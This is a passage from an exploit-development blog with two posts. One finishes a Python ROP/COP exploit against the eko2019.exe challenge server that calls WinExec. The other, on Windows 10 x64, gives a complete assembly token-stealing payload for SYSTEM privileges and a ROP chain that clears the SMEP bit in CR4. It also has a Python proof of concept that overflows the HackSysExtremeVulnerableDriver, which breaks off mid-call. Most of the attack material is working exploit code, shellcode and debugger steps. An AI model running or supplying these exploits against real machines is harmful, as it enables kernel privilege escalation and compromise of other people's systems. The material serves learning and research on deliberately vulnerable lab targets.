base_address = base_va_unpack[0]

print "[+] The base address for eko2019.exe is located at: {0}".format(hex(base_address))

# Closing the connection
s.close()

# Allow buffer room
sleep(2)

# 3rd stage

print "[+] Sending the third header..."
exploit_3 = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 byte offset to the byte we control
exploit_3 += "\x41" * 512

# Just want a vanilla mov rax, qword ptr[rcx], which already exists- so sliding in with a NOP to this instruction
exploit_3 += "\x90"

# Padding to load eko2019.exe+0x9010
exploit_3 += "\x41\x41\x41\x41\x41\x41\x41"
exploit_3 += struct.pack('<Q', base_address+0x9010)

# Message needs to be 528 bytes total
exploit_3 += "\x41" * (544-len(exploit_3))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit_3)

# Indexing the response to view RAX (VA of kernel32!WinExec)
receive_3 = s.recv(1024)
kernel32_unpack = struct.unpack_from('<Q', receive_3)
kernel32_winexec = kernel32_unpack[0]

print "[+] kernel32!WinExec is located at: {0}".format(hex(kernel32_winexec))

# Close the connection
s.close()

# 4th stage

# 16 total bytes
print "[+] Sending the fourth header..."
exploit_4 = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 byte offset to the byte we control
exploit_4 += "\x41" * 512

# push rcx (which we control)
exploit_4 += "\x51"

# Padding to load eko2019.exe+0x158b
exploit_4 += "\x41\x41\x41\x41\x41\x41\x41"
exploit_4 += struct.pack('<Q', base_address+0x158b)

# Message needs to be 528 bytes total
exploit_4 += "\x41" * (544-len(exploit_4))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit_4)

print "[+] Pivoted to the stack!"

# Don't need to index any data back through our read primitive, as we just want to stack pivot here
# Receiving data back from a connection is always best practice
s.recv(1024)

# Close the connection
s.close()

After executing the updated proof of concept, we continue execution to our move instruction as always. This time, we land on our intended push rcx instruction after executing the first two requests!

In addition, we can see RCX contains our specified ROP gadget!

After stepping through the push rcx instruction, we can see our ROP gadget gets loaded into RSP!

The next move instruction doesn’t matter to us at this point- as we are only worried about returning to the stack.

After we execute our ret to exit this function, we can clearly see that we have returned into our specified ROP gadget!

After we add to the value of RSP, we can see that when this ROP gadget returns- it will return into a region of memory that we control on the stack. We can view this via the Call stack in WinDbg.

Now that we have been able to successfully pivot back to the stack, it is time to attempt to pop calc.exe. Let’s start executing some useful ROP gadgets!

Recall that since we are working with the x64 architecture, we have to adhere to the __fastcall calling convention. As mentioned before, the registers we will use are:

  1. RCX -> First argument
  2. RDX -> Second argument
  3. R8 -> Third argument
  4. R9 -> Fourth argument
  5. RSP + 0x20 -> Fifth argument
  6. RSP + 0x28 -> Sixth argument
  7. etc.

A call to WinExec() is broken down as such, according to its documentation.

UINT WinExec(
  LPCSTR lpCmdLine,
  UINT   uCmdShow
);

This means that all we need to do, is place a value in RCX and RDX- as this function only takes two arguments.

Since we want to pop calc.exe, the first argument in this function should be a POINTER to an address that contains the string “calc”, which should be null terminated. This should be stored in RCX. lpCmdLine (the argument we are fulfilling) is the name of the application we would like to execute. Remember, this should be a pointer to the string.

The second argument, stored in RDX, is uCmdShow. These are the “display options”. The easiest option here, is to use SW_SHOWNORMAL- which just executes and displays the application normally. This means we will just need to place the value 0x1 into RDX, which is representative of SH_SHOWNORMAL.

Note- you can find all of these ROP gadgets from running rp++.

To start our ROP chain, we will just implement a “ROP NOP”, which will just return to the stack. This gadget is located at eko2019.exe+0x10a1

exploit_4 += struct.pack('<Q', base_address+0x10a1)			# ret: eko2019.exe

The next thing we would like to do, is get a pointer to the string “calc” into RCX. In order to do this, we are going to need to have write permissions to a memory address. Then, using a ROP gadget, we can overwrite what this address points to with our own value of “calc”, which is null terminated. Looking in IDA, we see only one of the sections that make up our executable has write permissions.

This means that we need to pick an address from the .data section within eko2019.exe to overwrite. The address we will use is eko2019.exe+0xC288- as it is the first available “blank” address.

We will place this address into RCX, via the following ROP/COP gadgets:

exploit_4 += struct.pack('<Q', base_address+0x1167)			# pop rax ; ret: eko2019.exe
exploit_4 += struct.pack('<Q', base_address+0xc288)			# First empty address in eko2019.exe .data section
exploit_4 += struct.pack('<Q', base_address+0x6375)			# mov rcx, rax ; call r12: eko2019.exe

In this program, there was only one ROP gadget that allowed us to control RCX in the manner we wished- which was mov rcx, rax ; call r12. Obviously, this gadget will not return to the stack like a ROP gadget- but it will call a register afterwards. This is what is known as “Call-Oriented Programming”, or COP. You may be asking “this address will not return to the stack- how will we keep executing”? There is an explanation for this!

Essentially, before we use the COP gadget, we can pop a ROP gadget into the register that will be called (e.g. R12 in this case). Then, when the COP gadget is executed and the register is called- it will be actually peforming a call to a ROP gadget we specify- which will be a return back to the stack in this case, via an add rsp, X instruction. Here is how this looks in totality.

# The next gadget is a COP gadget that does not return, but calls r12
# Placing an add rsp, 0x10 gadget to act as a "return" to the stack into r12
exploit_4 += struct.pack('<Q', base_address+0x4a8e)			# pop r12 ; ret: eko2019.exe
exploit_4 += struct.pack('<Q', base_address+0x8789)			# add rsp, 0x10 ; ret: eko2019.exe 

# Grabbing a blank address in eko2019.exe to write our calc string to and create a pointer (COP gadget)
# The blank address should come from the .data section, as IDA has shown this the only segment of the executable that is writeable
exploit_4 += struct.pack('<Q', base_address+0x1167)			# pop rax ; ret: eko2019.exe
exploit_4 += struct.pack('<Q', base_address+0xc288)			# First empty address in eko2019.exe .data section
exploit_4 += struct.pack('<Q', base_address+0x6375)			# mov rcx, rax ; call r12: eko2019.exe
exploit_4 += struct.pack('<Q', 0x4141414141414141)			# Padding from add rsp, 0x10

Great! This sequence will load a writeable address into the RCX register. The task now, is to somehow overwrite what this address is pointing to.

We stumble across another interesting ROP gadget that can help us achieve this goal!

mov qword [rcx], rax ; mov eax, 0x00000001 ; add rsp, 0x0000000000000080 ; pop rbx ; ret

This ROP gadget is from kernel32.dll. As you can recall, WinExec() is exported by kernel32.dll. This means we already have a valid address within kernel32.dll. Knowing this, we can find the distance between WinExec() and the base of kernel32.dll- which would allow us to dynamically resolve the base virtual address of kernel32.dll.

kernel32_base = kernel32_winexec-0x5e390

WinExec() is 0x5e390 bytes into kernel32.dll (on this version of Windows 10). Subtracting this value, will give us the base adddress of kernel32.dll! Now that we have resolved the base, this will allow us to calculate the offset and virtual memory address of our gadget in kernel32.dll dynamically.

Looking back at our ROP gadget- this gives us the ability to take the value in RAX and move it into the value POINTED TO by RCX. RCX already contains the address we would like to overwrite- so this is a perfect match! All we need to do now, is load the string “calc” (null terminated) into RAX! Here is what this looks like all put together.

# Creating a pointer to calc string
exploit_4 += struct.pack('<Q', base_address+0x1167)			# pop rax ; ret: eko2019.exe
exploit_4 += "calc\x00\x00\x00\x00"					# calc (with null terminator)
exploit_4 += struct.pack('<Q', kernel32_base+0x6130f)		        # mov qword [rcx], rax ; mov eax, 0x00000001 ; add rsp, 0x0000000000000080 ; pop rbx ; ret: kernel32.dll

# Padding for add rsp, 0x0000000000000080 and pop rbx
exploit_4 += "\x41" * 0x88

One things to keep in mind is that the ROP gadget that creates the pointer to “calc” (null terminated) has a few extra instructions on the end that we needed to compensate for.

The second parameter is much more straight forward. In kernel32.dll, we found another gadget that allows us to pop our own value into RDX.

# Placing second parameter into rdx
exploit_4 += struct.pack('<Q', kernel32_base+0x19daa)		# pop rdx ; add eax, 0x15FF0006 ; ret: kernel32.dll
exploit_4 += struct.pack('<Q', 0x01)			        # SH_SHOWNORMAL

Perfect! At this point, all we need to do is place the call to WinExec() on the stack! This is done with the following snippet of code.

# Calling kernel32!WinExec
exploit_4 += struct.pack('<Q', base_address+0x10a1)		# ret: eko2019.exe (ROP NOP)
exploit_4 += struct.pack('<Q', kernel32_winexec)	        # Address of kernel32!WinExec

In addition, we need to return to a valid address on the stack after the call to WinExec() so our prgram doesn’t crash after calc.exe is called. This is outlined below.

exploit_4 += struct.pack('<Q', base_address+0x89b6)			# add rsp, 0x48 ; ret: eko2019.exe
exploit_4 += "\x41" * 0x48 						# Padding to reach next ROP gadget
exploit_4 += struct.pack('<Q', base_address+0x89b6)			# add rsp, 0x48 ; ret: eko2019.exe
exploit_4 += "\x41" * 0x48 						# Padding to reach next ROP gadget
exploit_4 += struct.pack('<Q', base_address+0x89b6)			# add rsp, 0x48 ; ret: eko2019.exe
exploit_4 += "\x41" * 0x48 						# Padding to reach next ROP gadget
exploit_4 += struct.pack('<Q', base_address+0x2e71)			# add rsp, 0x38 ; ret: eko2019.exe

The final exploit code can be found here on my GitHub.

Let’s step through this final exploit in WinDbg to see how things break down.

We have already shown that our stack pivot was successful. After the pivot back to the stack and our ROP NOP which just returns back to the stack is executed, we can see that our pop r12 instruction has been hit. This will load a ROP gadget into R12 that will return to the stack- due to the fact our main ROP gadget calls R12, as explained earlier.

After we step through the instruction, we can see our ROP gadget for returning back to the stack has been loaded into R12.

We hit our next gadget, which pops the writeable address in the .data section of eko2019.exe into RAX. This value will be eventually placed into the RCX register- where the first function argument for WinExec() needs to be.

RAX now contains the blank, writeable address in the .data section.

After this gadget returns, we hit our main gadget of mov rcx, rax ; call r12.

The value of RAX is then placed into RCX. After this occurs, we can see that R12 is called and is going to execute our return back to the stack, add rsp, 0x10 ; ret.

Perfect! Our COP gadget and ROP gadgets worked together to load our intended address into RCX.

Next, we execute on our next pop rax gadget, which loads the value of “calc” into RAX (null terminated). 636c6163 = clac in hex to text. This is because we are compensating for the endianness of our processor (little endian).

We land on our most important ROP gadget to date after the return from the above gadget. This will take the string “calc” (null terminated) and point the address in RCX to it.

The address in RCX now points to the null terminated string “calc”.

Perfect! All we have to do now, is pop 0x1 into RDX- which has been completed by the subsequent ROP gadget.

Perfect! We have now landed on the call to WinExec()- and we can execute our shellcode!

All that is left to do now, is let everything run as intended!

Let’s run the final exploit.

Calc.exe FTW!

Big shoutout to Blue Frost Security for this binary- this was a very challenging experience and I feel I learned a lot from it. A big shout out as well to my friend @trickster012 for helping me with some of the problems I was having with __fastcall initially. Please contact me with any comments, questions, or corrections.

Peace, love, and positivity :-)

Exploit Development: Panic! At The Kernel - Token Stealing Payloads Revisited on Windows 10 x64 and Bypassing SMEP

1 February 2020 at 00:00

Introduction

Same ol’ story with this blog post- I am continuing to expand my research/overall knowledge on Windows kernel exploitation, in addition to garnering more experience with exploit development in general. Previously I have talked about a couple of vulnerability classes on Windows 7 x86, which is an OS with minimal protections. With this post, I wanted to take a deeper dive into token stealing payloads, which I have previously talked about on x86, and see what differences the x64 architecture may have. In addition, I wanted to try to do a better job of explaining how these payloads work. This post and research also aims to get myself more familiar with the x64 architecture, which is a far more common in 2020, and understand protections such as Supervisor Mode Execution Prevention (SMEP).

Gimme Dem Tokens!

As apart of Windows, there is something known as the SYSTEM process. The SYSTEM process, PID of 4, houses the majority of kernel mode system threads. The threads stored in the SYSTEM process, only run in context of kernel mode. Recall that a process is a “container”, of sorts, for threads. A thread is the actual item within a process that performs the execution of code. You may be asking “How does this help us?” Especially, if you did not see my last post. In Windows, each process object, known as _EPROCESS, has something known as an access token. Recall that an object is a dynamically created (configured at runtime) structure. Continuing on, this access token determines the security context of a process or a thread. Since the SYSTEM process houses execution of kernel mode code, it will need to run in a security context that allows it to access the kernel. This would require system or administrative privilege. This is why our goal will be to identify the access token value of the SYSTEM process and copy it to a process that we control, or the process we are using to exploit the system. From there, we can spawn cmd.exe from the now privileged process, which will grant us NT AUTHORITY\SYSTEM privileged code execution.

Identifying the SYSTEM Process Access Token

We will use Windows 10 x64 to outline this overall process. First, boot up WinDbg on your debugger machine and start a kernel debugging session with your debugee machine (see my post on setting up a debugging enviornment). In addition, I noticed on Windows 10, I had to execute the following command on my debugger machine after completing the bcdedit.exe commands from my previous post: bcdedit.exe /dbgsettings serial debugport:1 baudrate:115200)

Once that is setup, execute the following command, to dump the active processes:

!process 0 0

This returns a few fields of each process. We are most interested in the “process address”, which has been outlined in the image above at address 0xffffe60284651040. This is the address of the _EPROCESS structure for a specified process (the SYSTEM process in this case). After enumerating the process address, we can enumerate much more detailed information about process using the _EPROCESS structure.

dt nt!_EPROCESS <Process address>

dt will display information about various variables, data types, etc. As you can see from the image above, various data types of the SYSTEM process’s _EPROCESS structure have been displayed. If you continue down the kd window in WinDbg, you will see the Token field, at an offset of _EPROCESS + 0x358.

What does this mean? That means for each process on Windows, the access token is located at an offset of 0x358 from the process address. We will for sure be using this information later. Before moving on, however, let’s take a look at how a Token is stored.

As you can see from the above image, there is something called _EX_FAST_REF, or an Executive Fast Reference union. The difference between a union and a structure, is that a union stores data types at the same memory location (notice there is no difference in the offset of the various fields to the base of an _EX_FAST_REF union as shown in the image below. All of them are at an offset of 0x000). This is what the access token of a process is stored in. Let’s take a closer look.

dt nt!_EX_FAST_REF

Take a look at the RefCnt element. This is a value, appended to the access token, that keeps track of references of the access token. On x86, this is 3 bits. On x64 (which is our current architecture) this is 4 bits, as shown above. We want to clear these bits out, using bitwise AND. That way, we just extract the actual value of the Token, and not other unnecessary metadata.

To extract the value of the token, we simply need to view the _EX_FAST_REF union of the SYSTEM process at an offset of 0x358 (which is where our token resides). From there, we can figure out how to go about clearing out RefCnt.

dt nt!_EX_FAST_REF <Process address>+0x358

As you can see, RefCnt is equal to 0y0111. 0y denotes a binary value. So this means RefCnt in this instance equals 7 in decimal.

So, let’s use bitwise AND to try to clear out those last few bits.

? TOKEN & 0xf

As you can see, the result is 7. This is not the value we want- it is actually the inverse of it. Logic tells us, we should take the inverse of 0xf, -0xf.

So- we have finally extracted the value of the raw access token. At this point, let’s see what happens when we copy this token to a normal cmd.exe session.

Openenig a new cmd.exe process on the debuggee machine:

After spawning a cmd.exe process on the debuggee, let’s identify the process address in the debugger.

!process 0 0 cmd.exe

As you can see, the process address for our cmd.exe process is located at 0xffffe6028694d580. We also know, based on our research earlier, that the Token of a process is located at an offset of 0x358 from the process address. Let’s Use WinDbg to overwrite the cmd.exe access token with the access token of the SYSTEM process.

Now, let’s take a look back at our previous cmd.exe process.

As you can see, cmd.exe has become a privileged process! Now the only question remains- how do we do this dynamically with a piece of shellcode?

Assembly? Who Needs It. I Will Never Need To Know That- It’s iRrElEvAnT

‘Nuff said.

Anyways, let’s develop an assembly program that can dynamically perform the above tasks in x64.

So let’s start with this logic- instead of spawning a cmd.exe process and then copying the SYSTEM process access token to it- why don’t we just copy the access token to the current process when exploitation occurs? The current process during exploitation should be the process that triggers the vulnerability (the process where the exploit code is ran from). From there, we could spawn cmd.exe from (and in context) of our current process after our exploit has finished. That cmd.exe process would then have administrative privilege.

Before we can get there though, let’s look into how we can obtain information about the current process.

If you use the Microsoft Docs (formerly known as MSDN) to look into process data structures you will come across this article. This article states there is a Windows API function that can identify the current process and return a pointer to it! PsGetCurrentProcessId() is that function. This Windows API function identifies the current thread and then returns a pointer to the process in which that thread is found. This is identical to IoGetCurrentProcess(). However, Microsoft recommends users invoke PsGetCurrentProgress() instead. Let’s unassemble that function in WinDbg.

uf nt!PsGetCurrentProcess

Let’s take a look at the first instruction mov rax, qword ptr gs:[188h]. As you can see, the GS segment register is in use here. This register points to a data segment, used to access different types of data structures. If you take a closer look at this segment, at an offset of 0x188 bytes, you will see KiInitialThread. This is a pointer to the _KTHREAD entry in the current threads _ETHREAD structure. As a point of contention, know that _KTHREAD is the first entry in _ETHREAD structure. The _ETHREAD structure is the thread object for a thread (similar to how _EPROCESS is the process object for a process) and will display more granular information about a thread. nt!KiInitialThread is the address of that _ETHREAD structure. Let’s take a closer look.

dqs gs:[188h]

This shows the GS segment register, at an offset of 0x188, holds an address of 0xffffd500e0c0cc00 (different on your machine because of ASLR/KASLR). This should be the nt!KiInitialThread, or the _ETHREAD structure for the current thread. Let’s verify this with WinDbg.

!thread -p

As you can see, we have verified that nt!KiInitialThread represents the address of the current thread.

Recall what was mentioned about threads and processes earlier. Threads are the part of a process that actually perform execution of code (for our purposes, these are kernel threads). Now that we have identified the current thread, let’s identify the process associated with that thread (which would be the current process). Let’s go back to the image above where we unassembled the PsGetCurrentProcess() function.

mov rax, qword ptr [rax,0B8h]

RAX alread contains the value of the GS segment register at an offset of 0x188 (which contains the current thread). The above assembly instruction will move the value of nt!KiInitialThread + 0xB8 into RAX. Logic tells us this has to be the location of our current process, as the only instruction left in the PsGetCurrentProcess() routine is a ret. Let’s investigate this further.

Since we believe this is going to be our current process, let’s view this data in an _EPROCESS structure.

dt nt!_EPROCESS poi(nt!KiInitialThread+0xb8)

First, a little WinDbg kung-fu. poi essentially dereferences a pointer, which means obtaining the value a pointer points to.

And as you can see, we have found where our current proccess is! The PID for the current process at this time is the SYSTEM process (PID = 4). This is subject to change dependent on what is executing, etc. But, it is very important we are able to identify the current process.

Let’s start building out an assembly program that tracks what we are doing.

; Windows 10 x64 Token Stealing Payload
; Author: Connor McGarr

[BITS 64]

_start:
	mov rax, [gs:0x188]		    ; Current thread (_KTHREAD)
	mov rax, [rax + 0xb8]	   	    ; Current process (_EPROCESS)
  	mov rbx, rax			    ; Copy current process (_EPROCESS) to rbx

Notice that I copied the current process, stored in RAX, into RBX as well. You will see why this is needed here shortly.

Take Me For A Loop!

Let’s take a look at a few more elements of the _EPROCESS structure.

dt nt!_EPROCESS

Let’s take a look at the data structure of ActiveProcessLinks, _LIST_ENTRY

dt nt!_LIST_ENTRY

ActiveProcessLinks is what keeps track of the list of current processes. How does it keep track of these processes you may be wondering? Its data structure is _LIST_ENTRY, a doubly linked list. This means that each element in the linked list not only points to the next element, but it also points to the previous one. Essentially, the elements point in each direction. As mentioned earlier and just as a point of reiteration, this linked list is responsible for keeping track of all active processes.

There are two elements of _EPROCESS we need to keep track of. The first element, located at an offset of 0x2e0 on Windows 10 x64, is UniqueProcessId. This is the PID of the process. The other element is ActiveProcessLinks, which is located at an offset 0x2e8.

So essentially what we can do in x64 assembly, is locate the current process from the aforementioned method of PsGetCurrentProcess(). From there, we can iterate and loop through the _EPROCESS structure’s ActiveLinkProcess element (which keeps track of every process via a doubly linked list). After reading in the current ActiveProcessLinks element, we can compare the current UniqueProcessId (PID) to the constant 4, which is the PID of the SYSTEM process. Let’s continue our already started assembly program.

; Windows 10 x64 Token Stealing Payload
; Author: Connor McGarr

[BITS 64]

_start:
	mov rax, [gs:0x188]		; Current thread (_KTHREAD)
	mov rax, [rax + 0xb8]	   	; Current process (_EPROCESS)
  	mov rbx, rax			; Copy current process (_EPROCESS) to rbx
	
__loop:
	mov rbx, [rbx + 0x2e8] 		; ActiveProcessLinks
	sub rbx, 0x2e8		   	; Go back to current process (_EPROCESS)
	mov rcx, [rbx + 0x2e0] 		; UniqueProcessId (PID)
	cmp rcx, 4 			; Compare PID to SYSTEM PID 
	jnz __loop			; Loop until SYSTEM PID is found

Once the SYSTEM process’s _EPROCESS structure has been found, we can now go ahead and retrieve the token and copy it to our current process. This will unleash God mode on our current process. God, please have mercy on the soul of our poor little process.

Once we have found the SYSTEM process, remember that the Token element is located at an offset of 0x358 to the _EPROCESS structure of the process.

Let’s finish out the rest of our token stealing payload for Windows 10 x64.

; Windows 10 x64 Token Stealing Payload
; Author: Connor McGarr

[BITS 64]

_start:
	mov rax, [gs:0x188]		; Current thread (_KTHREAD)
	mov rax, [rax + 0xb8]		; Current process (_EPROCESS)
	mov rbx, rax			; Copy current process (_EPROCESS) to rbx
__loop:
	mov rbx, [rbx + 0x2e8] 		; ActiveProcessLinks
	sub rbx, 0x2e8		   	; Go back to current process (_EPROCESS)
	mov rcx, [rbx + 0x2e0] 		; UniqueProcessId (PID)
	cmp rcx, 4 			; Compare PID to SYSTEM PID 
	jnz __loop			; Loop until SYSTEM PID is found

	mov rcx, [rbx + 0x358]		; SYSTEM token is @ offset _EPROCESS + 0x358
	and cl, 0xf0			; Clear out _EX_FAST_REF RefCnt
	mov [rax + 0x358], rcx		; Copy SYSTEM token to current process

	xor rax, rax			; set NTSTATUS SUCCESS
	ret				; Done!

Notice our use of bitwise AND. We are clearing out the last 4 bits of the RCX register, via the CL register. If you have read my post about a socket reuse exploit, you will know I talk about using the lower byte registers of the x86 or x64 registers (RCX, ECX, CX, CH, CL, etc). The last 4 bits we need to clear out , in an x64 architecture, are located in the low or L 8-bit register (CL, AL, BL, etc).

As you can see also, we ended our shellcode by using bitwise XOR to clear out RAX. NTSTATUS uses RAX as the regsiter for the error code. NTSTATUS, when a value of 0 is returned, means the operations successfully performed.

Before we go ahead and show off our payload, let’s develop an exploit that outlines bypassing SMEP. We will use a stack overflow as an example, in the kernel, to outline using ROP to bypass SMEP.

SMEP Says Hello

What is SMEP? SMEP, or Supervisor Mode Execution Prevention, is a protection that was first implemented in Windows 8 (in context of Windows). When we talk about executing code for a kernel exploit, the most common technique is to allocate the shellcode in user mode and the call it from the kernel. This means the user mode code will be called in context of the kernel, giving us the applicable permissions to obtain SYSTEM privileges.

SMEP is a prevention that does not allow us execute code stored in a ring 3 page from ring 0 (executing code from a higher ring in general). This means we cannot execute user mode code from kernel mode. In order to bypass SMEP, let’s understand how it is implemented.

SMEP policy is mandated/enabled via the CR4 register. According to Intel, the CR4 register is a control register. Each bit in this register is responsible for various features being enabled on the OS. The 20th bit of the CR4 register is responsible for SMEP being enabled. If the 20th bit of the CR4 register is set to 1, SMEP is enabled. When the bit is set to 0, SMEP is disabled. Let’s take a look at the CR4 register on Windows with SMEP enabled in normal hexadecimal format, as well as binary (so we can really see where that 20th bit resides).

r cr4

The CR4 register has a value of 0x00000000001506f8 in hexadecimal. Let’s view that in binary, so we can see where the 20th bit resides.

.formats cr4

As you can see, the 20th bit is outlined in the image above (counting from the right). Let’s use the .formats command again to see what the value in the CR4 register needs to be, in order to bypass SMEP.

As you can see from the above image, when the 20th bit of the CR4 register is flipped, the hexadecimal value would be 0x00000000000506f8.

This post will cover how to bypass SMEP via ROP using the above information. Before we do, let’s talk a bit more about SMEP implementation and other potential bypasses.

SMEP is ENFORCED via the page table entry (PTE) of a memory page through the form of “flags”. Recall that a page table is what contains information about which part of physical memory maps to virtual memory. The PTE for a memory page has various flags that are associated with it. Two of those flags are U, for user mode or S, for supervisor mode (kernel mode). This flag is checked when said memory is accessed by the memory management unit (MMU). Before we move on, lets talk about CPU modes for a second. Ring 3 is responsible for user mode application code. Ring 0 is responsible for operating system level code (kernel mode). The CPU can transition its current privilege level (CPL) based on what is executing. I will not get into the lower level details of syscalls, sysrets, or other various routines that occur when the CPU changes the CPL. This is also not a blog on how paging works. If you are interested in learning more, I HIGHLY suggest the book What Makes It Page: The Windows 7 (x64) Virtual Memory Manager by Enrico Martignetti. Although this is specific to Windows 7, I believe these same concepts apply today. I give this background information, because SMEP bypassses could potentially abuse this functionality.

Think of the implementation of SMEP as the following:

Laws are created by the government. HOWEVER, the legislatures do not roam the streets enforcing the law. This is the job of our police force.

The same concept applies to SMEP. SMEP is enabled by the CR4 register- but the CR4 register does not enforce it. That is the job of the page table entries.

Why bring this up? Athough we will be outlining a SMEP bypass via ROP, let’s consider another scenario. Let’s say we have an arbitrary read and write primitive. Put aside the fact that PTEs are randomized for now. What if you had a read primitive to know where the PTE for the memory page of your shellcode was? Another potential (and interesting) way to bypass SMEP would be not to “disable SMEP” at all. Let’s think outside the box! Instead of “going to the mountain”- why not “bring the mountain to us”? We could potentially use our read primitive to locate our user mode shellcode page, and then use our write primitive to overwrite the PTE for our shellcode and flip the U (usermode) flag into an S (supervisor mode) flag! That way, when that particular address is executed although it is a “user mode address”, it is still executed because now the permissions of that page are that of a kernel mode page.

Although page table entries are randomized now, this presentation by Morten Schenk of Offensive Security talks about derandomizing page table entries.

Morten explains the steps as the following, if you are too lazy to read his work:

  1. Obtain read/write primitive
  2. Leak ntoskrnl.exe (kernel base)
  3. Locate MiGetPteAddress() (can be done dynamically instead of static offsets)
  4. Use PTE base to obtain PTE of any memory page
  5. Change bit (whether it is copying shellcode to page and flipping NX bit or flipping U/S bit of a user mode page)

Again, I will not be covering this method of bypassing SMEP until I have done more research on memory paging in Windows. See the end of this blog for my thoughts on other SMEP bypasses going forward.

SMEP Says Goodbye

Let’s use the an overflow to outline bypasssing SMEP with ROP. ROP assumes we have control over the stack (as each ROP gadget returns back to the stack). Since SMEP is enabled, our ROP gagdets will need to come from kernel mode pages. Since we are assuming medium integrity here, we can call EnumDeviceDrivers() to obtain the kernel base- which bypasses KASLR.

Essentially, here is how our ROP chain will work

-------------------
pop <reg> ; ret
-------------------
VALUE_WANTED_IN_CR4 (0x506f8) - This can be our own user supplied value.
-------------------
mov cr4, <reg> ; ret
-------------------
User mode payload address
-------------------

Let’s go hunting for these ROP gadgets. (NOTE - ALL OFFSETS TO ROP GADGETS WILL VARY DEPENDING ON OS, PATCH LEVEL, ETC.) Remember, these ROP gadgets need to be kernel mode addresses. We will use rp++ to enumerate rop gadgets in ntoskrnl.exe. If you take a look at my post about ROP, you will see how to use this tool.

Let’s figure out a way to control the contents of the CR4 register. Although we won’t probably won’t be able to directly manipulate the contents of the register directly, perhaps we can move the contents of a register that we can control into the CR4 register. Recall that a pop <reg> operation will take the contents of the next item on the stack, and store it in the register following the pop operation. Let’s keep this in mind.

Using rp++, we have found a nice ROP gadget in ntoskrnl.exe, that allows us to store the contents of CR4 in the ecx register (the “second” 32-bits of the RCX register.)

As you can see, this ROP gadget is “located” at 0x140108552. However, since this is a kernel mode address- rp++ (from usermode and not ran as an administrator) will not give us the full address of this. However, if you remove the first 3 bytes, the rest of the “address” is really an offset from the kernel base. This means this ROP gadget is located at ntoskrnl.exe + 0x108552.

Awesome! rp++ was a bit wrong in its enumeration. rp++ says that we can put ECX into the CR4 register. Howerver, upon further inspection, we can see this ROP gadget ACTUALLY points to a mov cr4, rcx instruction. This is perfect for our use case! We have a way to move the contents of the RCX register into the CR4 register. You may be asking “Okay, we can control the CR4 register via the RCX register- but how does this help us?” Recall one of the properties of ROP from my previous post. Whenever we had a nice ROP gadget that allowed a desired intruction, but there was an unecessary pop in the gadget, we used filler data of NOPs. This is because we are just simply placing data in a register- we are not executing it.

The same principle applies here. If we can pop our intended flag value into RCX, we should have no problem. As we saw before, our intended CR4 register value should be 0x506f8.

Real quick with brevity- let’s say rp++ was right in that we could only control the contents of the ECX register (instead of RCX). Would this affect us?

Recall, however, how the registers work here.

-----------------------------------
               RCX
-----------------------------------
                       ECX
-----------------------------------
                             CX
-----------------------------------
                           CH    CL
-----------------------------------

This means, even though RCX contains 0x00000000000506f8, a mov cr4, ecx would take the lower 32-bits of RCX (which is ECX) and place it into the CR4 register. This would mean ECX would equal 0x000506f8- and that value would end up in CR4. So even though we would theoretically using both RCX and ECX, due to lack of pop ecx ROP gadgets, we will be unaffected!

Now, let’s continue on to controlling the RCX register.

Let’s find a pop rcx gadget!

Nice! We have a ROP gadget located at ntoskrnl.exe + 0x3544. Let’s update our POC with some breakpoints where our user mode shellcode will reside, to verify we can hit our shellcode. This POC takes care of the semantics such as finding the offset to the ret instruction we are overwriting, etc.

import struct
import sys
import os
from ctypes import *

kernel32 = windll.kernel32
ntdll = windll.ntdll
psapi = windll.Psapi


payload = bytearray(
    "\xCC" * 50
)

# Defeating DEP with VirtualAlloc. Creating RWX memory, and copying our shellcode in that region.
# We also need to bypass SMEP before calling this shellcode
print "[+] Allocating RWX region for shellcode"
ptr = kernel32.VirtualAlloc(
    c_int(0),                         # lpAddress
    c_int(len(payload)),              # dwSize
    c_int(0x3000),                    # flAllocationType
    c_int(0x40)                       # flProtect
)

# Creates a ctype variant of the payload (from_buffer)
c_type_buffer = (c_char * len(payload)).from_buffer(payload)

print "[+] Copying shellcode to newly allocated RWX region"
kernel32.RtlMoveMemory(
    c_int(ptr),                       # Destination (pointer)
    c_type_buffer,                    # Source (pointer)
    c_int(len(payload))               # Length
)

# Need kernel leak to bypass KASLR
# Using Windows API to enumerate base addresses
# We need kernel mode ROP gadgets

# c_ulonglong because of x64 size (unsigned __int64)
base = (c_ulonglong * 1024)()

print "[+] Calling EnumDeviceDrivers()..."

get_drivers = psapi.EnumDeviceDrivers(
    byref(base),                      # lpImageBase (array that receives list of addresses)
    sizeof(base),                     # cb (size of lpImageBase array, in bytes)
    byref(c_long())                   # lpcbNeeded (bytes returned in the array)
)

# Error handling if function fails
if not base:
    print "[+] EnumDeviceDrivers() function call failed!"
    sys.exit(-1)

# The first entry in the array with device drivers is ntoskrnl base address
kernel_address = base[0]

print "[+] Found kernel leak!"
print "[+] ntoskrnl.exe base address: {0}".format(hex(kernel_address))

# Offset to ret overwrite
input_buffer = "\x41" * 2056

# SMEP says goodbye
print "[+] Starting ROP chain. Goodbye SMEP..."
input_buffer += struct.pack('<Q', kernel_address + 0x3544)      # pop rcx; ret

print "[+] Flipped SMEP bit to 0 in RCX..."
input_buffer += struct.pack('<Q', 0x506f8)           		# Intended CR4 value

print "[+] Placed disabled SMEP value in CR4..."
input_buffer += struct.pack('<Q', kernel_address + 0x108552)    # mov cr4, rcx ; ret

print "[+] SMEP disabled!"
input_buffer += struct.pack('<Q', ptr)                          # Location of user mode shellcode

input_buffer_length = len(input_buffer)

# 0x222003 = IOCTL code that will jump to TriggerStackOverflow() function
# Getting handle to driver to return to DeviceIoControl() function
print "[+] Using CreateFileA() to obtain and return handle referencing the driver..."
handle = kernel32.CreateFileA(
    "\\\\.\\HackSysExtremeVulnerableDriver", # lpFileName
    0xC0000000,                         # dwDesiredAccess
    0,                                  # dwShareMode
    None,                               # lpSecurityAttributes
    0x3,                                # dwCreationDisposition
    0,                                  # dwFlagsAndAttributes
    None                                # hTemplateFile
)

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
print "[+] Interacting with the driver..."
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x222003,                           # dwIoControlCode
    input_buffer,                       # lpInBuffer
    input_buffer_length,                # nInBufferSize
    None,                               # lpOutBuffer
